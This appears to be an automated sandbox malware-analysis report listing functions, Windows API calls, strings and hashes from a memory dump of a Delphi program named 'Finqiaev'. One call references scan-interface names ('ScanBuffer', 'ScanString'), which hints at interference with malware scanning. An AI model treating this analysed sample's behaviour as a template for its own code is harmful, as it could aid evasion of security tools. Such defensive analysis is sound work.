Instruction ID: 7299e774a50139da96f8101b566e6630fdba2bd407bb9afb113ea00a8bf50ba5
Opcode Fuzzy Hash: 986dd824a8754cd4c4cb1db69f1774ff7cd07cf09d9633d06f7f9f2d4bba3c64
Instruction Fuzzy Hash: F8117F71680204ABEB10FBA8CD52FDE77A8DF44B4CF514824B184F7292DA39BD408B99

Uniqueness

Uniqueness Score: -1.00%

Function 0410B768 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0410B7A3
NtClose.NTDLL(?), ref: 0410B81D

Part of subcall function 040B4F68: SysFreeString.OLEAUT32 ref: 040B4F76

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Path$CloseFreeNameName_String
String ID:
API String ID: 11680810-0
Opcode ID: d5e3c6e6f76cc681fe04342ebf49db991ace250901030d4858c1c4b4affca6ca
Instruction ID: 3fe0b8aedde59ede2f6f05a0595d564f94d7ef2b15b6bedeace11db2f7c19c83
Opcode Fuzzy Hash: d5e3c6e6f76cc681fe04342ebf49db991ace250901030d4858c1c4b4affca6ca
Instruction Fuzzy Hash: 9621CF71A54318BEEB11EBE4CC82FDE77ACEB08B08F514565B600F71D1DAB4BA058794

Uniqueness

Uniqueness Score: -1.00%

Function 040F7420 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,040F7598), ref: 040F7441
GetCurrentThreadId.KERNEL32 ref: 040F748F
GlobalAddAtomA.KERNEL32(00000000), ref: 040F74C5
RegisterClipboardFormatA.USER32(00000000), ref: 040F74DB

Part of subcall function 040C7B44: RtlInitializeCriticalSection.NTDLL(List), ref: 040C7B63

Part of subcall function 040F7028: SetErrorMode.KERNEL32(00008000), ref: 040F7041
Part of subcall function 040F7028: GetModuleHandleA.KERNEL32(USER32,00000000,040F718E,?,00008000), ref: 040F7065
Part of subcall function 040F7028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040F7072
Part of subcall function 040F7028: LoadLibraryA.KERNEL32(imm32.dll,00000000,040F718E,?,00008000), ref: 040F708E
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmGetContext), ref: 040F70B0
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmReleaseContext), ref: 040F70C5
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmGetConversionStatus), ref: 040F70DA
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetConversionStatus), ref: 040F70EF
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetOpenStatus), ref: 040F7104
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionWindow), ref: 040F7119
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmSetCompositionFontA), ref: 040F712E
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmGetCompositionStringA), ref: 040F7143
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmIsIME), ref: 040F7158
Part of subcall function 040F7028: GetProcAddress.KERNEL32(0411B54C,ImmNotifyIME), ref: 040F716D
Part of subcall function 040F7028: SetErrorMode.KERNEL32(?,040F7195,00008000), ref: 040F7188

Part of subcall function 04101538: GetKeyboardLayout.USER32(00000000), ref: 0410157D
Part of subcall function 04101538: GetDC.USER32(00000000), ref: 041015D2
Part of subcall function 04101538: GetDeviceCaps.GDI32(00000000,0000005A), ref: 041015DC
Part of subcall function 04101538: ReleaseDC.USER32(00000000,00000000), ref: 041015E7

Part of subcall function 04102740: LoadIconA.USER32(04147030,MAINICON), ref: 04102837
Part of subcall function 04102740: GetModuleFileNameA.KERNEL32(04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 04102869
Part of subcall function 04102740: OemToCharA.USER32(?,?), ref: 0410287C
Part of subcall function 04102740: CharNextA.USER32(?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000), ref: 041028BB
Part of subcall function 04102740: CharLowerA.USER32(00000000,?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?), ref: 041028C1

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 040F755F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040F7570

Strings

AnimateWindow, xrefs: 040F756A
ControlOfs%.8X%.8X, xrefs: 040F74A3
USER32, xrefs: 040F755A
Delphi%.8X, xrefs: 040F7452

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressProc$CharModule$CurrentErrorHandleLoadMode$AtomCapsClipboardCriticalDeviceFileFormatGlobalIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterReleaseSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1057156030-1126952177
Opcode ID: 852a8b46a83f871145cc75d002059090c737d9721559722dee6042179705ab5e
Instruction ID: 39a98c13365bcc990180284cf0dfcd9b044c6e91d64984d7ed03b223f9ce5192
Opcode Fuzzy Hash: 852a8b46a83f871145cc75d002059090c737d9721559722dee6042179705ab5e
Instruction Fuzzy Hash: 374138B8A002058FEB00FFA9D880ADE77A9EF4970CB018574E504FB751DA79B9408F99

Uniqueness

Uniqueness Score: -1.00%

Function 04102740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(04147030,MAINICON), ref: 04102837
GetModuleFileNameA.KERNEL32(04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 04102869
OemToCharA.USER32(?,?), ref: 0410287C
CharNextA.USER32(?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?,00000000), ref: 041028BB
CharLowerA.USER32(00000000,?,?,?,04147030,?,00000100,04147030,MAINICON,?,?,?,040F7530,00000000,00000000,?), ref: 041028C1

Part of subcall function 04102A94: GetClassInfoA.USER32(041497F8,0411B674,?), ref: 04102AF3
Part of subcall function 04102A94: RegisterClassA.USER32(0411B650), ref: 04102B0B
Part of subcall function 04102A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04102BA7
Part of subcall function 04102A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04102BC9

Strings

MAINICON, xrefs: 0410282A

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: 0b0d52fd9efd31a32b20633cb203d192e0bccb7644e29cbcd625471bdbdd4b6d
Instruction ID: a74f4f4ac10e0960e87dfd002769c09b99532fe97b4063d2f8c4a96f9ef05fe0
Opcode Fuzzy Hash: 0b0d52fd9efd31a32b20633cb203d192e0bccb7644e29cbcd625471bdbdd4b6d
Instruction Fuzzy Hash: 22516E746042449FEB40EF68C8C4BC53BE4AB5530CF4481F9DC88DF396D7BAA9888B65

Uniqueness

Uniqueness Score: -1.00%

Function 040B17C3 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 040B186C
Sleep.KERNEL32(0000000A,00000000), ref: 040B1882

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f684149fa0e6b04a13656b4649f5843955386b95d62aed01cc0db59f871ed84e
Instruction ID: 6efd7dd1566bbdff0cd89df54ed1fefcc5e7288028a6f0b3a2245226c360aa89
Opcode Fuzzy Hash: f684149fa0e6b04a13656b4649f5843955386b95d62aed01cc0db59f871ed84e
Instruction Fuzzy Hash: 7DB136766003008BC715CF29E8A43A5BBE1FB85395F5882AED4A5AF3C4D738B881C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 040B1B2B Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 040B1BB3
Sleep.KERNEL32(0000000A,00000000), ref: 040B1BCD

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 302eb44aeb4b83a34f1bf02b5b9f6656d3d792dafdbf17bda4408af885dbb1b4
Instruction ID: 23e7c7e061841e3f415a129563c92c030bbc69462290c7a639c4b6e328e1af83
Opcode Fuzzy Hash: 302eb44aeb4b83a34f1bf02b5b9f6656d3d792dafdbf17bda4408af885dbb1b4
Instruction Fuzzy Hash: E551F4716103008EE7168F28D9A4BD6BBD0EB45395F2881AED4C4AF381E774E884C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 040D765C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,0414A374,00000048), ref: 040D7682

Part of subcall function 040D7618: SelectObject.GDI32(00000000,0414A380), ref: 040D7633
Part of subcall function 040D7618: ReleaseDC.USER32(00000000,00000000), ref: 040D764F

Strings

MS Shell Dlg 2, xrefs: 040D76EC
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 040D76D8
Tahoma, xrefs: 040D76A4

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ObjectReleaseSelect
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 1831053106-1011973972
Opcode ID: 0aa38e67d68171a1d3b5dd12af30e81f0cb5949525c4cff0528f2071aec57ae9
Instruction ID: 3f637ed1767d1b7b2a259c0970337fa4c2e0d46d64ea1ae4b43fa653e84788d3
Opcode Fuzzy Hash: 0aa38e67d68171a1d3b5dd12af30e81f0cb5949525c4cff0528f2071aec57ae9
Instruction Fuzzy Hash: D0119E34600308AFEB41EFA8CD41DAD7BF5EB4A60CFA148A4E844B7650DB35BE09CB54

Uniqueness

Uniqueness Score: -1.00%

Function 040CEA38 Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoA.USER32(041497F8,0411AB1C,?), ref: 040CEA59
UnregisterClassA.USER32(0411AB1C,041497F8), ref: 040CEA82
RegisterClassA.USER32(0411AAF8), ref: 040CEA8C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 040CEAD7

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 7ad92c2972097bec342ffed490c2d13b86604c6c9aff0be5fd64be96a23b713a
Instruction ID: f92fab2d85c694a94e1a1bca2b7d3a1142c91baba5127d36c074fe34ca78ec1f
Opcode Fuzzy Hash: 7ad92c2972097bec342ffed490c2d13b86604c6c9aff0be5fd64be96a23b713a
Instruction Fuzzy Hash: 9C015E71700101ABEA40EBA9DC80EDE37A9EB49308F104114F954F72D1D639BD8087E9

Uniqueness

Uniqueness Score: -1.00%

Function 040D0308 Relevance: 4.6, APIs: 3, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040D04A2), ref: 040D0374
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,040D04A2), ref: 040D03DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 040D0444

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 36bfc9563f4e921bbb51083220b0f322cb4ec72a4d99854e45a3c95292d810e1
Instruction ID: fb2fddb8070c846ec2eb0cdb532259629bc22cdd5a563cdad19bb65571a9fe0d
Opcode Fuzzy Hash: 36bfc9563f4e921bbb51083220b0f322cb4ec72a4d99854e45a3c95292d810e1
Instruction Fuzzy Hash: 99416570B40308AFEB11EBA4C951FDEB7F9AF4470CF104469A848B7252D7B5AF099B85

Uniqueness

Uniqueness Score: -1.00%

Function 040CF2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 040CF5A6

Strings

H, xrefs: 040CF35D

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 8f4da43b886c13e1020a43c40f9af8e5e2caf2025a143cf5c56765b02e35dd61
Instruction ID: 6f134420629ab51672cafa0f950170d3e09f3aee800e2e82b0e3c37323afba2b
Opcode Fuzzy Hash: 8f4da43b886c13e1020a43c40f9af8e5e2caf2025a143cf5c56765b02e35dd61
Instruction Fuzzy Hash: DCB1F574A01609EFDB50CFA8D880A9DBBF2FF89314F248169E905AB3A0D730AC45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 040D04C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,040D0524), ref: 040D04F2

Strings

MS Shell Dlg 2, xrefs: 040D04C1, 040D04C3

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction ID: 23c6488a3df2776ea6407875b4712c703af763ece4616d18605390f843757248
Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction Fuzzy Hash: A1F030763092086BE704EAAD9D40FEB7BDCDB89658F01853AB94CD7241DA21ED0983B5

Uniqueness

Uniqueness Score: -1.00%

Function 040B4444 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8707da026dcfc9045cf0ea18ee677af009f35ed02cce36516ff8712054d3577
Instruction ID: 8bcc54a5fcf72d21c2568d07f0f76d7ef871bbe3b0f361c79f16b4ba99eb1bab
Opcode Fuzzy Hash: a8707da026dcfc9045cf0ea18ee677af009f35ed02cce36516ff8712054d3577
Instruction Fuzzy Hash: 3541B1B98012048FEF64DF79D0847D63BE0FB46369F144159D894AB282C778AED1CF99

Uniqueness

Uniqueness Score: -1.00%

Function 040BF6D0 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 040BF6DF

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1e5d98aae3d8d43aa0c7820116f54dfd8caed5e229c3ed6d7fbe6c34bafc0db7
Instruction ID: f16b98c44c37cd92e714251bbf2a0cfd015ab9b535cb311e1e8e60fbaf6c8e89
Opcode Fuzzy Hash: 1e5d98aae3d8d43aa0c7820116f54dfd8caed5e229c3ed6d7fbe6c34bafc0db7
Instruction Fuzzy Hash: D7F0AF7834020286AB116B38CC84DE923D89F4164CB5048A5E8C6FB351DB29BC0AD2EF

Uniqueness

Uniqueness Score: -1.00%

Function 040BF768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 040BF7A8

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 3f1e6f221de558faeb8de9162c877786d6f502a6c103b04044eae493afdca4e3
Instruction ID: 9cf30b27f705aaa8d821106a8b880d438eec3a123bd563d2817049e58020df67
Opcode Fuzzy Hash: 3f1e6f221de558faeb8de9162c877786d6f502a6c103b04044eae493afdca4e3
Instruction Fuzzy Hash: F731427560010AABEB50DFA8CC84EEE77E8EB49308F4445A6FD85E3250D634F951CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 040BFACC Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 040BFAED

Part of subcall function 040BF6D0: VariantClear.OLEAUT32(?), ref: 040BF6DF

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 37ac465d116c4e807ce44c4bb44da02dca8a54c9d0c5f9d4aaa41b47a99f8c8d
Instruction ID: 7833dab7c82ff67fac37a1a0b62c94f2cd683789e1802f1fab12f54aca81be83
Opcode Fuzzy Hash: 37ac465d116c4e807ce44c4bb44da02dca8a54c9d0c5f9d4aaa41b47a99f8c8d
Instruction Fuzzy Hash: F011A370700212869720AF28CC90DDB73D9EFC56587148425E8CAFB715DA34EC40D7DA

Uniqueness

Uniqueness Score: -1.00%

Function 040B738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040B73CB

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction ID: 7653487c0296b048cc4412507e1bd2c8b3964cb43da8d3d8bb49b02680226ba6
Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction Fuzzy Hash: 9FF092B2700119BF9B80DE9DDC84EDB77ECEB4C268B054169FA0CE3200D630ED109BA4

Uniqueness

Uniqueness Score: -1.00%

Function 040B738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040B73CB

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction ID: 4f74c5877243d30483ecb213e4f90ca86b71f9b137c1b997b773be35d2b8f21f
Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction Fuzzy Hash: C9F092B2600119BF9B80DE9DDC84EDB77ECEB4C268B054169FA0CE3200D630ED109BA4

Uniqueness

Uniqueness Score: -1.00%

Function 041195F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0411967E), ref: 04119612

Part of subcall function 040F7420: GetCurrentProcessId.KERNEL32(?,00000000,040F7598), ref: 040F7441
Part of subcall function 040F7420: GetCurrentThreadId.KERNEL32 ref: 040F748F
Part of subcall function 040F7420: GlobalAddAtomA.KERNEL32(00000000), ref: 040F74C5
Part of subcall function 040F7420: RegisterClipboardFormatA.USER32(00000000), ref: 040F74DB
Part of subcall function 040F7420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040F7598), ref: 040F755F
Part of subcall function 040F7420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040F7570

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Current$AddressAtomClipboardFormatGlobalHandleModuleProcProcessRegisterThreadVersion
String ID:
API String ID: 2893432522-0
Opcode ID: 542f8c97f433e11aa1ee4885e41a1e3bd5ff6e6342743f3c0ab55b21f50d10c9
Instruction ID: 72cb38d6466e3ffb13ac72a67327584482b7b05859bbcfaa9feb5e34eac223de
Opcode Fuzzy Hash: 542f8c97f433e11aa1ee4885e41a1e3bd5ff6e6342743f3c0ab55b21f50d10c9
Instruction Fuzzy Hash: 05F06278215701EFE315EF6AED5185937E4EBCAB0C3414834E800AB724DABCBCA1DE55

Uniqueness

Uniqueness Score: -1.00%

Function 040B5B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02A81B20,?,00000105), ref: 040B5B96

Part of subcall function 040B5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 040B5DF8
Part of subcall function 040B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E16
Part of subcall function 040B5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5E34
Part of subcall function 040B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040B5E52
Part of subcall function 040B5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040B5E9B
Part of subcall function 040B5DDC: RegQueryValueExA.ADVAPI32(?,040B6048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,040B5EE1,?,80000001), ref: 040B5EB9
Part of subcall function 040B5DDC: RegCloseKey.ADVAPI32(?,040B5EE8,00000000,00000000,00000005,00000000,040B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040B5EDB

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
Instruction ID: f458e2cd4a7a8125e58b17774bef88f22a01b7641f612dc1ec2daefe68b118bf
Opcode Fuzzy Hash: 9711488165f6f9e55e6370d5228eb4c6dcd107eca0bc8f5d3348138f1f8277e7
Instruction Fuzzy Hash: 0EE0ED72A01214DFDF50DE58C9C4AC637E8AB08658F0446A1AD98DF386D3B1EE608BD5

Uniqueness

Uniqueness Score: -1.00%

Function 040B4FA4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 040B4F76

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
Instruction ID: 3fc61638885f7cd57f71e67a2f15c00c19abc85cefa025ce68395bbc6813798a
Opcode Fuzzy Hash: baa1517bdadcfa67c0915616b3a2d67137bee1b5e396a356b24dbef79078f2ff
Instruction Fuzzy Hash: B5E086B41002025DEE545A188850AF632B99BD1340F5A855C6481BF191DB34B901E6EC

Uniqueness

Uniqueness Score: -1.00%

Function 040D0274 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,?,040D02E0,?,?,00000000,040D048C,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 040D028E

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
Instruction ID: 7743a0dbbd6b6e90b42ab6db2f3766210ef3904d5c76c8752d40d6d64ef62484
Opcode Fuzzy Hash: eb308aadd2150d80a81e6751e0f9366a3a2839943b2371eba3ae4dd0f782da46
Instruction Fuzzy Hash: DED017B17113008AEF90EF7588C4B967BDC6F08208F48C8A1D84CEF206DA29E4148F64

Uniqueness

Uniqueness Score: -1.00%

Function 040B8E04 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0411062B,ScanString,041469E4,04117AE0,OpenSession,041469E4,04117AE0,OpenSession,041469E4,04117AE0,ScanBuffer,041469E4,04117AE0,ScanString), ref: 040B8E0F

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction ID: 4648cd23a0e28598eef59c31b674eb3136c9bd942464d9ba1a9ee4bcb02b01a3
Opcode Fuzzy Hash: f573ade78a336dd4723e6fd7a98d565a78c6aeba897005d26862891ebc9d14c6
Instruction Fuzzy Hash: 91C08CA23112000A2ED0B9FC0DC48DA02CC4A0413D3202F22F4F9F32F3D323B0A32098

Uniqueness

Uniqueness Score: -1.00%

